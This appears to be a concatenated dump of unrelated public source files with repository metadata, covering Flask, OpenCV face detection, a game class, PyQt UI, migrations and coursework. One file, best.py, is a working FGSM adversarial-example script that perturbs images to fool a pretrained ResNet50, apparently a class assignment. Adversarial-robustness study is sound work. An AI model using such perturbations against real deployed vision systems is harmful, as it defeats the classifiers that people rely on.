# intermediate mapping used to build the 0-1 transaction matrix
b=map(ct,data.as_matrix())
data=pd.DataFrame(b).fillna(0) # fill missing entries with 0
end=time.clock()
print u'转换矩阵完毕,用时:%0.2f秒' %(end-start)
del b # drop the intermediate variable

support=0.06
confidence=0.75
ms='---'
start=time.clock()
print u'开始搜索关联规则...'
find_rule(data,support,confidence,ms)
end=time.clock()
print u'搜索完成,用时%0.2f秒'%(end-start)
|
[
"noreply@github.com"
] |
noreply@github.com
|
58eef740f0a71ad36123660a1cea5be91fcd8b15
|
fdee1ecf7cdf11c15771bd325897775060fed64c
|
/app/errors/__init__.py
|
f139f1d53be91d9cbf4e98a335b4ca7ab36b4c6d
|
[] |
no_license
|
SIRLA-FJULIS/LIS-Lib-Shift-Arrangement-System
|
67feda105c16e085b28bbd64fec048c92e5c2dec
|
707644ab48df857630a404c4d017b19d786d6694
|
refs/heads/master
| 2020-05-22T04:49:07.575629
| 2020-04-10T09:40:05
| 2020-04-10T09:40:05
| 186,222,486
| 1
| 0
| null | 2021-01-23T09:01:20
| 2019-05-12T06:59:36
|
Python
|
UTF-8
|
Python
| false
| false
| 100
|
py
|
from flask import Blueprint

# Blueprint grouping the application's error handlers.
errors = Blueprint('errors', __name__)

# Imported after the blueprint exists: handlers registers itself on
# `errors`, so importing it earlier would create a circular import.
from app.errors import handlers
|
[
"opp40519@gmail.com"
] |
opp40519@gmail.com
|
31c62fc913b614a426a1d11bfdb7c02603bd6e2b
|
6096f62297b072c566a6572ac460eb75c4e439f3
|
/人工神经网络实现/opencv预处理.py
|
fe350e967ffe833fedcbaa55a2d309d7a41056a6
|
[] |
no_license
|
kenan666/learngit
|
7397810dc76b5fa5ec9d24ae060a7f8528f687f7
|
e8da383991c21ae0e1ec28510d04f0cc76f1c729
|
refs/heads/master
| 2020-04-07T08:07:23.430761
| 2019-01-06T09:04:40
| 2019-01-06T09:04:40
| 158,199,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,061
|
py
|
# Pipeline: load xml cascades -> load image -> grayscale -> detect -> iterate and annotate
import cv2
import numpy as np
# load xml file
face_xml = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_xml = cv2.CascadeClassifier('haarcascade_eye.xml')
# load jpg file
img = cv2.imread('face.jpg')
cv2.imshow('src',img)
# convert to grayscale (Haar detection runs on gray images)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# detect faces: scale factor 1.3, min 5 neighbours
faces = face_xml.detectMultiScale(gray,1.3,5)
print ('face =',len (faces))
# draw
index = 0
for (x,y,w,h) in faces:
    cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2) # rectangle marks the detected face
    roi_face = gray[y:y+h,x:x+w]
    roi_color = img [y:y+h,x:x+w]
    # save each detected face crop as <index>.jpg
    fileName = str(index) + '.jpg'
    cv2.imwrite(fileName,roi_color)
    index = index + 1
    # eye detection must run on the grayscale ROI
    eyes = eye_xml.detectMultiScale(roi_face)
    print ('eye = ',len(eyes))
    #for (e_x,e_y,e_w,e_h) in eyes:
        #cv2.rectangle(roi_color,(e_x,e_y),(e_x+e_w,e_y+e_h),(0,255,0),2)
cv2.imshow('dst',img)
cv2.waitKey(0)
|
[
"1746740633@qq.com"
] |
1746740633@qq.com
|
5b9637487e45d95d05cd2fac74ca279bc4cf8938
|
d0befba20015501fbd57888abf78eeb24389ac40
|
/prac1b.py
|
5530fe3d9cd1635b5ae73798c763acd3f7587816
|
[] |
no_license
|
satyamthaker/Data-Structure
|
0de59a24cbcdf9472a3546c52dc2c534b1c947df
|
fdbbc2c7b601037e71e482dcf08bf02ae69641ef
|
refs/heads/master
| 2023-01-03T05:26:33.761829
| 2020-10-29T05:01:55
| 2020-10-29T05:01:55
| 295,732,823
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
m1 = [[1,2,3],
[4 ,5,6],
[7 ,8,9]]
m2 = [[10,11,12,13],
[14,15,16,17],
[18,19,20,21]]
res = [[0,0,0,0],
[0,0,0,0],
[0,0,0,0]]
for i in range(len(m1)):
for j in range(len(m2[0])):
for k in range(len(m2)):
res[i][j] += m1[i][k] * m2[k][j]
for n in res:
print(n)
|
[
"noreply@github.com"
] |
noreply@github.com
|
7b1f422a0751188ab3254f50f1c2e5c5b56b4a51
|
41e69a2c4802e038841948f49854f6e72c472179
|
/bin/pip
|
7f00391542197da72f764c63753ec02da696125b
|
[] |
no_license
|
edisonik/artesanato_brasileiro.github.io
|
6d4246ef9cafac0e749d6c1e44afd0a1e28cca77
|
2ad99cadf5ab6c6afe5544fcc267975b230add96
|
refs/heads/master
| 2020-05-07T13:57:46.227961
| 2019-07-15T02:19:22
| 2019-07-15T02:19:22
| 180,570,562
| 1
| 0
| null | 2019-07-15T23:55:29
| 2019-04-10T11:50:12
|
Python
|
UTF-8
|
Python
| false
| false
| 241
|
#!/var/www/artesanato_brasileiro/bin/python3
# -*- coding: utf-8 -*-
# Auto-generated console-script shim: runs pip from this virtualenv.
import re
import sys

from pip._internal import main

if __name__ == '__main__':
    # Strip a trailing "-script.pyw" / ".exe" from argv[0] so pip reports
    # a clean program name on Windows-style launchers.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"root@ip-172-31-6-208.sa-east-1.compute.internal"
] |
root@ip-172-31-6-208.sa-east-1.compute.internal
|
|
94f78ff7515cedf224519e07f552630acac3127a
|
a857d1911a118b8aa62ffeaa8f154c8325cdc939
|
/toontown/estate/DistributedFireworksCannon.py
|
d5691917f5a2a6d4d53e4cdd97782a58257a8ec5
|
[
"MIT"
] |
permissive
|
DioExtreme/TT-CL-Edition
|
761d3463c829ec51f6bd2818a28b667c670c44b6
|
6b85ca8352a57e11f89337e1c381754d45af02ea
|
refs/heads/main
| 2023-06-01T16:37:49.924935
| 2021-06-24T02:25:22
| 2021-06-24T02:25:22
| 379,310,849
| 0
| 0
|
MIT
| 2021-06-22T15:07:31
| 2021-06-22T15:07:30
| null |
UTF-8
|
Python
| false
| false
| 4,308
|
py
|
from toontown.toonbase.ToontownGlobals import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from HouseGlobals import *
from toontown.effects import DistributedFireworkShow
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
from panda3d.core import CollisionSphere, CollisionNode
import FireworksGui
class DistributedFireworksCannon(DistributedFireworkShow.DistributedFireworkShow):
notify = directNotify.newCategory('DistributedFireworksCannon')
    def __init__(self, cr):
        # cr: the client repository that owns this distributed object.
        DistributedFireworkShow.DistributedFireworkShow.__init__(self, cr)
        # Lazily-created FireworksGui panel; None while closed.
        self.fireworksGui = None
        self.load()
        return
def generateInit(self):
DistributedFireworkShow.DistributedFireworkShow.generateInit(self)
self.fireworksSphereEvent = self.uniqueName('fireworksSphere')
self.fireworksSphereEnterEvent = 'enter' + self.fireworksSphereEvent
self.fireworksGuiDoneEvent = 'fireworksGuiDone'
self.shootEvent = 'fireworkShootEvent'
self.collSphere = CollisionSphere(0, 0, 0, 2.5)
self.collSphere.setTangible(1)
self.collNode = CollisionNode(self.fireworksSphereEvent)
self.collNode.setIntoCollideMask(ToontownGlobals.WallBitmask)
self.collNode.addSolid(self.collSphere)
self.collNodePath = self.geom.attachNewNode(self.collNode)
def generate(self):
DistributedFireworkShow.DistributedFireworkShow.generate(self)
def announceGenerate(self):
self.notify.debug('announceGenerate')
self.accept(self.fireworksSphereEnterEvent, self.__handleEnterSphere)
def disable(self):
self.notify.debug('disable')
self.ignore(self.fireworksSphereEnterEvent)
self.ignore(self.shootEvent)
self.ignore(self.fireworksGuiDoneEvent)
if self.fireworksGui:
self.fireworksGui.destroy()
self.fireworksGui = None
DistributedFireworkShow.DistributedFireworkShow.disable(self)
return
def delete(self):
self.notify.debug('delete')
self.geom.removeNode()
DistributedFireworkShow.DistributedFireworkShow.delete(self)
def load(self):
self.geom = loader.loadModel('phase_5/models/props/trashcan_TT.bam')
self.geom.reparentTo(base.cr.playGame.hood.loader.geom)
self.geom.setScale(0.5)
def __handleEnterSphere(self, collEntry):
self.notify.debug('handleEnterSphere()')
self.ignore(self.fireworksSphereEnterEvent)
self.sendUpdate('avatarEnter', [])
def __handleFireworksDone(self):
self.ignore(self.fireworksGuiDoneEvent)
self.ignore(self.shootEvent)
self.sendUpdate('avatarExit')
self.fireworksGui.destroy()
self.fireworksGui = None
return
def freeAvatar(self):
base.localAvatar.posCamera(0, 0)
base.cr.playGame.getPlace().setState('walk')
self.accept(self.fireworksSphereEnterEvent, self.__handleEnterSphere)
def setMovie(self, mode, avId, timestamp):
timeStamp = globalClockDelta.localElapsedTime(timestamp)
isLocalToon = avId == base.localAvatar.doId
if mode == FIREWORKS_MOVIE_CLEAR:
self.notify.debug('setMovie: clear')
return
elif mode == FIREWORKS_MOVIE_GUI:
self.notify.debug('setMovie: gui')
if isLocalToon:
self.fireworksGui = FireworksGui.FireworksGui(self.fireworksGuiDoneEvent, self.shootEvent)
self.accept(self.fireworksGuiDoneEvent, self.__handleFireworksDone)
self.accept(self.shootEvent, self.localShootFirework)
return
else:
self.notify.warning('unknown mode in setMovie: %s' % mode)
def setPosition(self, x, y, z):
self.pos = [x, y, z]
self.geom.setPos(x, y, z)
def localShootFirework(self, index):
style = index
col1, col2 = self.fireworksGui.getCurColor()
amp = 30
dummy = base.localAvatar.attachNewNode('dummy')
dummy.setPos(0, 100, 60)
pos = dummy.getPos(render)
dummy.removeNode()
print 'lauFirework: %s, col=%s' % (index, col1)
self.d_requestFirework(pos[0], pos[1], pos[2], style, col1, col2)
|
[
"devinhall4@gmail.com"
] |
devinhall4@gmail.com
|
b9948cf1676e6d0a8275b85e3147d5465083dffc
|
b89ce172f2a793924f3a159ab15541342d4c989e
|
/hw5/best.py
|
063dc3d08f6206a32384219d2855c68308d06e1f
|
[] |
no_license
|
KiyoM99/ML2019SPRING
|
42e63cc06136f4db673ad3940ae35d83ce5046e6
|
a9157759f00bb3f36be785513c969027cfe2dca7
|
refs/heads/master
| 2020-04-24T07:18:44.353378
| 2019-06-07T14:53:33
| 2019-06-07T14:53:33
| 171,795,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,603
|
py
|
# coding: utf-8
# In[1]:
from PIL import Image
import numpy as np
import pickle as pk
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import torch.nn as nn
import torch.utils.data
import random as ran
import time
import torchvision.transforms as transforms
import sys
# In[2]:
def load_image( infilename ) :
img = Image.open( infilename )
img.load()
data = np.asarray( img, dtype="int32" )
return data
def save_image( npdata, outfilename ) :
img = Image.fromarray( np.asarray( np.clip(npdata,0,255), dtype="uint8"), "L" )
img.save( outfilename )
# In[3]:
a=np.zeros((1,224,224,3))
for i in range(200):
b=load_image(sys.argv[1]+'/'+str(1000+i)[1:]+'.png')
b=np.reshape(b,(1,224,224,3))
a=np.concatenate((a,b))
print(np.shape(a))
a=a/255
a1=a[1:]
# In[4]:
a3=np.zeros((200,3,224,224))
for i in range(200):
for l in range(3):
for n in range(224):
for p in range(224):
a3[i][l][n][p]=a1[i][n][p][l]
# In[5]:
a2=np.copy(a3)
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
for i in range(200):
a2[i][0]=(a2[i][0]-mean[0])/std[0]
a2[i][1]=(a2[i][1]-mean[1])/std[1]
a2[i][2]=(a2[i][2]-mean[2])/std[2]
# In[6]:
aaaaa='305 883 243 559 438 990 949 853 609 582 915 455 619 961 630 741 455 707 854 922 129 537 672 476 299 99 476 251 520 923 760 582 525 317 464 478 667 961 865 324 33 922 142 312 302 582 948 360 789 440 746 764 949 480 792 900 733 327 441 882 920 839 955 555 519 510 888 990 430 396 97 78 140 362 705 659 640 967 489 937 991 887 603 467 498 879 807 708 967 472 287 853 971 805 719 854 471 890 572 883 476 581 603 967 311 873 582 16 672 780 489 685 366 746 599 912 950 614 348 353 21 84 437 946 746 646 544 469 597 81 734 719 51 293 897 416 544 415 814 295 829 759 971 306 637 471 94 984 708 863 391 383 417 442 38 858 716 99 546 137 980 517 322 765 632 595 754 805 873 475 455 442 734 879 685 521 640 663 720 759 535 582 607 859 532 113 695 565 554 311 8 385 570 480 324 897 738 814 253 751'
aaaaa=aaaaa.split(' ')
aaaaa=np.asarray(aaaaa)
# In[7]:
aaaaa=aaaaa.astype(np.int)
# In[8]:
import torchvision.models as models
VGG19 = models.resnet50(True)
# In[9]:
x=a2
y=aaaaa
# In[10]:
VGG19.eval()
VGG19=VGG19.cuda()
# In[11]:
x1=torch.from_numpy(x)
y1=torch.from_numpy(y)
x1=x1.type("torch.FloatTensor")
y1=y1.long()
train_dataset = torch.utils.data.TensorDataset(x1,y1)
# In[12]:
test_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=8,
shuffle=False)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=1,
shuffle=False)
# In[13]:
def fgsm_attack(image, epsilon, data_grad):
sign_data_grad = data_grad.sign()
perturbed_image = image + epsilon*sign_data_grad
return perturbed_image
# In[14]:
def test( model, test_loader, epsilon ):
nnn=[]
correct = 0
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
data.requires_grad = True
output = model(data)
init_pred = output.max(1, keepdim=True)[1]
#if init_pred.item() != target.item():
#continue
loss = F.nll_loss(output, target)
model.zero_grad()
loss.backward()
data_grad = data.grad.data
perturbed_data = fgsm_attack(data, epsilon, data_grad)
ppp=perturbed_data.cpu().detach().numpy()
nnn.append(ppp)
output = model(perturbed_data)
final_pred = output.max(1, keepdim=True)[1]
if final_pred.item() == target.item():
correct += 1
final_acc = correct/float(len(test_loader))
print("Epsilon: {}\tTest Accuracy = {} / {} = {}".format(epsilon, correct, len(test_loader), final_acc))
return final_acc, nnn
# In[15]:
torch.manual_seed(1654822)
for i in range(2):
a,nnn=test(VGG19,train_loader,0.02)
nnn1=np.asarray(nnn)
nnn1=np.reshape(nnn1,(200, 3, 224, 224))
nnn2=torch.from_numpy(nnn1)
nnn2=nnn2.type("torch.FloatTensor")
nnn_dataset = torch.utils.data.TensorDataset(nnn2,y1)
train_loader = torch.utils.data.DataLoader(dataset=nnn_dataset,
batch_size=1,
shuffle=False)
# In[16]:
x=nnn1
# In[17]:
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
for i in range(200):
x[i][0]=x[i][0]*std[0]+mean[0]
x[i][1]=x[i][1]*std[1]+mean[1]
x[i][2]=x[i][2]*std[2]+mean[2]
# In[18]:
a=np.zeros((200,224,224,3))
tt=time.time()
for i in range(200):
if i%40==0:
print(i,time.time()-tt)
tt=time.time()
for l in range(224):
for n in range(224):
for p in range(3):
a[i][l][n][p]=x[i][p][l][n]
if a[i][l][n][p]>1:
a[i][l][n][p]=1
elif a[i][l][n][p]<0:
a[i][l][n][p]=0
# In[19]:
a=a*255
a=np.rint(a)
a=a.astype(np.uint8)
# In[20]:
x=a
# In[21]:
x=x.astype(np.uint8)
# In[22]:
for i in range(200):
img = Image.fromarray(x[i])
img.save(sys.argv[2]+'/'+str(1000+i)[1:]+'.png')
|
[
"noreply@github.com"
] |
noreply@github.com
|
ffcfbf0bf4d986773c415aa90c4c6801a6d49e20
|
ef50f38a4bba1f34ae1bc8f74b962088e2cce6e7
|
/form.py
|
71bd8903253793e0f6020dd12b8158731d712203
|
[] |
no_license
|
PeterSanctus/Slave_Success-V2
|
b71f340cc76d41f542f45836ea70881c920e3090
|
2d9212612199562f5c243c157a1efaaa917be6e4
|
refs/heads/master
| 2020-03-06T22:45:48.483387
| 2018-03-28T08:04:50
| 2018-03-28T08:04:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,152
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'form.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(687, 364)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(687, 364))
MainWindow.setMaximumSize(QtCore.QSize(687, 364))
MainWindow.setStyleSheet("Qwidget::setFixedSize(587,334);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.prjButton = QtWidgets.QPushButton(self.centralwidget)
self.prjButton.setGeometry(QtCore.QRect(10, 20, 51, 20))
self.prjButton.setObjectName("prjButton")
self.prjLineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.prjLineEdit.setGeometry(QtCore.QRect(80, 20, 201, 20))
self.prjLineEdit.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.prjLineEdit.setReadOnly(True)
self.prjLineEdit.setObjectName("prjLineEdit")
self.taskLineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.taskLineEdit.setEnabled(True)
self.taskLineEdit.setGeometry(QtCore.QRect(80, 70, 201, 20))
self.taskLineEdit.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.taskLineEdit.setReadOnly(True)
self.taskLineEdit.setObjectName("taskLineEdit")
self.taskButton = QtWidgets.QPushButton(self.centralwidget)
self.taskButton.setEnabled(False)
self.taskButton.setGeometry(QtCore.QRect(10, 70, 51, 20))
self.taskButton.setObjectName("taskButton")
self.slaveCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.slaveCkBox.setGeometry(QtCore.QRect(50, 170, 181, 17))
self.slaveCkBox.setObjectName("slaveCkBox")
self.microCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.microCkBox.setGeometry(QtCore.QRect(50, 230, 181, 17))
self.microCkBox.setObjectName("microCkBox")
self.logCkBox = QtWidgets.QCheckBox(self.centralwidget)
self.logCkBox.setGeometry(QtCore.QRect(50, 260, 181, 17))
self.logCkBox.setStyleSheet("")
self.logCkBox.setObjectName("logCkBox")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(30, 140, 191, 191))
self.groupBox.setStyleSheet("QGroupBox {\n"
" border: 1px solid gray;\n"
" border-radius: 9px;\n"
" margin-top: 0.5em;\n"
"}\n"
"QGroupBox::title {\n"
" subcontrol-origin: margin;\n"
" left: 10px;\n"
" padding: 0 3px 0 3px;\n"
"}")
self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.groupBox.setCheckable(False)
self.groupBox.setObjectName("groupBox")
self.runSlaveCkBox = QtWidgets.QCheckBox(self.groupBox)
self.runSlaveCkBox.setEnabled(False)
self.runSlaveCkBox.setGeometry(QtCore.QRect(20, 60, 141, 16))
self.runSlaveCkBox.setObjectName("runSlaveCkBox")
self.exportsButton = QtWidgets.QPushButton(self.groupBox)
self.exportsButton.setEnabled(False)
self.exportsButton.setGeometry(QtCore.QRect(40, 155, 75, 23))
self.exportsButton.setObjectName("exportsButton")
self.logWindow = QtWidgets.QTextBrowser(self.centralwidget)
self.logWindow.setGeometry(QtCore.QRect(300, 20, 371, 311))
font = QtGui.QFont()
font.setPointSize(9)
self.logWindow.setFont(font)
self.logWindow.setStyleSheet("color: rgb(93, 93, 93);\n"
"margin: 0; \n"
"padding: 0;\n"
"size: 8 px;")
self.logWindow.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.logWindow.setTabStopWidth(80)
self.logWindow.setObjectName("logWindow")
self.groupBox.raise_()
self.prjButton.raise_()
self.prjLineEdit.raise_()
self.taskLineEdit.raise_()
self.taskButton.raise_()
self.logCkBox.raise_()
self.microCkBox.raise_()
self.slaveCkBox.raise_()
self.logWindow.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 687, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.prjButton, self.taskButton)
MainWindow.setTabOrder(self.taskButton, self.slaveCkBox)
MainWindow.setTabOrder(self.slaveCkBox, self.microCkBox)
MainWindow.setTabOrder(self.microCkBox, self.logCkBox)
MainWindow.setTabOrder(self.logCkBox, self.exportsButton)
MainWindow.setTabOrder(self.exportsButton, self.prjLineEdit)
MainWindow.setTabOrder(self.prjLineEdit, self.taskLineEdit)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Slave Sucess V2.0"))
self.prjButton.setText(_translate("MainWindow", "Prj"))
self.taskButton.setText(_translate("MainWindow", "Task"))
self.slaveCkBox.setText(_translate("MainWindow", "Export Slave Task"))
self.microCkBox.setText(_translate("MainWindow", "Export Microstation Script"))
self.logCkBox.setText(_translate("MainWindow", "Export Log File"))
self.groupBox.setTitle(_translate("MainWindow", "Report Options"))
self.runSlaveCkBox.setText(_translate("MainWindow", "Start Slave"))
self.exportsButton.setText(_translate("MainWindow", "Export"))
self.logWindow.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">[TerraScan Project]</span></p></body></html>"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
[
"plsm.mail@gmail.com"
] |
plsm.mail@gmail.com
|
ab53f17683a218aa029fd6013d35ccf0601a5433
|
91cce084c57639a636c5e4ddae7f8d9e5db3b3ab
|
/starter_code/migrations/versions/108af48a152f_.py
|
7c5f8777c1633a0e797b9060869f40a15286d16e
|
[] |
no_license
|
Aishwarya1403/Udacity-Fyyur_project-FullStack
|
42209286b59d3164381b532e02b2822d4dde5f5f
|
721d5d8af835b13ad87b2670856a9fb221618d36
|
refs/heads/master
| 2022-11-26T22:15:43.680217
| 2020-08-05T09:45:39
| 2020-08-05T09:45:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
"""empty message
Revision ID: 108af48a152f
Revises: 6acad7d52248
Create Date: 2020-05-19 04:05:39.462836
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '108af48a152f'
down_revision = '6acad7d52248'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Show', 'start_time',
existing_type=postgresql.TIMESTAMP(),
nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Show', 'start_time',
existing_type=postgresql.TIMESTAMP(),
nullable=True)
# ### end Alembic commands ###
|
[
"a.srivastava1403@gmail.com"
] |
a.srivastava1403@gmail.com
|
3fa5ddad1d1612a8b0d4168c59f4f0549f95f6ff
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02937/s033330652.py
|
6b68eb0299616b86752097386250b1b8f9320039
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 473
|
py
|
import bisect
s = input()
t = input()
n = len(s)
m = len(t)
indices = [[] for _ in range(26)]
for i in range(n):
indices[ord(s[i]) - ord('a')].append(i)
for i in range(n):
indices[ord(s[i]) - ord('a')].append(i + n)
ans = 0
p = 0
for i in range(m):
c = ord(t[i]) - ord('a')
if len(indices[c]) == 0:
print(-1)
exit()
p = indices[c][bisect.bisect_left(indices[c], p)] + 1
if p >= n:
p -= n
ans += n
ans += p
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8e1c89bb6ae45adc09778546ef4ded2df3e23d3a
|
287118f0a80d4cc07cf40c4c2cd08734a792bf90
|
/python/manage.py
|
3f154b0e92a0525b01db81a5024af2f3673463c5
|
[] |
no_license
|
bfincher/bfim
|
13818acd272fbacf677f16b21ee76a9d2ed55051
|
cabfa434a9daedb47be4786fb7e980379407296b
|
refs/heads/master
| 2020-07-13T21:37:20.736140
| 2015-06-30T01:26:03
| 2015-06-30T01:26:03
| 73,883,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bfim_site.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"brian@fincherhome.com"
] |
brian@fincherhome.com
|
26b5572ac0a822370e8ce622fbd232f24cebdcaa
|
51521862877916257fb965dcf6114f5402fa8b35
|
/code/test55.py
|
659dccfd09b71613c95709701dab0a194e2ceec9
|
[] |
no_license
|
404akhan/proj3-math
|
592170e032ea7f55830a3c66eaff3c01a02af34b
|
bdccf3d769e3d7c0ab6ea923e3442dd304edc002
|
refs/heads/master
| 2021-01-21T17:28:30.531798
| 2017-05-21T20:34:33
| 2017-05-21T20:34:33
| 91,953,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,417
|
py
|
# lasso
from helpers import *
import matplotlib.pyplot as plt
top = 70
train, test = get_tr_cv()
cells = pickle.load(open('data/very_new_cells_one_hot-%d.p'%top, 'rb'))
print train.shape
print cells.shape
print 'top', top
version = 67
lr = 0.03
aver_loss, aver_corr = None, None
bsize = 10000
arr_loss = []
for lamb in reversed([3*1e-4, 1e-4, 3*1e-5, 1e-5, 3*1e-6, 1e-6, 0.]):
print 'lamb %f STARTED' % (lamb)
betas = np.zeros((get_total_drug(), cells.shape[1]))
betas0 = np.zeros((get_total_drug()))
accum_grad = np.zeros_like(betas)
accum_grad0 = np.zeros_like(betas0)
accum_loss = 0
accum_correct = 0
for iteration, sample in enumerate(train):
k, i, j, target = sample
y = np.tanh(
np.dot(betas[i, :], cells[k, :]) - np.dot(betas[j, :], cells[k, :]) + betas0[i] - betas0[j]
)
L = 1./2 * (y - target)**2
accum_correct += (y>0 and target==1) or (y<=0 and target==-1)
dy = y - target
da = (1 - y**2) * dy
dbi = cells[k, :] * da + lamb*np.sign(betas[i, :])
dbj = -cells[k, :] * da + lamb*np.sign(betas[j, :])
db0i = da
db0j = -da
accum_grad[i, :] += dbi
accum_grad[j, :] += dbj
accum_grad0[i] += db0i
accum_grad0[j] += db0j
accum_loss += L
if (iteration+1) % bsize == 0:
betas -= lr * accum_grad
betas0 -= lr * accum_grad0
accum_loss_div = accum_loss/bsize
accum_correct /= 1.*bsize
aver_loss = accum_loss_div if aver_loss is None else accum_loss_div * 0.01 + aver_loss * 0.99
aver_corr = accum_correct if aver_corr is None else accum_correct * 0.01 + aver_corr * 0.99
arr_loss.append(accum_loss_div)
if (iteration+1) % bsize*10 == 0:
print 'iter %d, cur_loss %.2f, aver_loss %.2f, accum_correct %.2f, aver_corr %.2f' % \
(iteration+1, accum_loss_div, aver_loss, accum_correct, aver_corr)
accum_grad = np.zeros_like(betas)
accum_grad0 = np.zeros_like(betas0)
accum_loss = 0
accum_correct = 0
lr /= 2
correct = 0
total = 0
for iteration, sample in enumerate(test):
k, i, j, target = sample
y = np.tanh(
np.dot(betas[i, :], cells[k, :]) - np.dot(betas[j, :], cells[k, :]) + betas0[i] - betas0[j]
)
predict = 1 if y > 0 else -1
if predict == target:
correct += 1
total += 1
print 'heldout validation', correct * 1.0 / total, 'lambda', lamb
pickle.dump(betas, open('models/betas-v%d.p'%version, 'wb'))
pickle.dump(betas0, open('models/betas0-v%d.p'%version, 'wb'))
plt.plot(arr_loss)
plt.show()
|
[
"404akhan"
] |
404akhan
|
af2bbcc8ef30479f1f105c85962d48fc4fbeaac4
|
d5e134c4287e2a8e6e676ee6877418c9727e06e3
|
/LINDE799_FinalProject.py
|
e47f61c91a2815d440da0d9025feb8237885717f
|
[] |
no_license
|
ErikLindeman12/CSCI_1133
|
6fcc93f047d0d0ee199a628a4d854070f6da19be
|
91d8ff08b7a327427c9a274442e6ab951f0731ee
|
refs/heads/master
| 2020-03-28T14:54:00.870836
| 2018-09-12T19:57:29
| 2018-09-12T19:57:29
| 148,532,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,117
|
py
|
#Final Project
#Erik Lindeman, LINDE799, 5424984
#CSCI 1133
import turtle
class County:
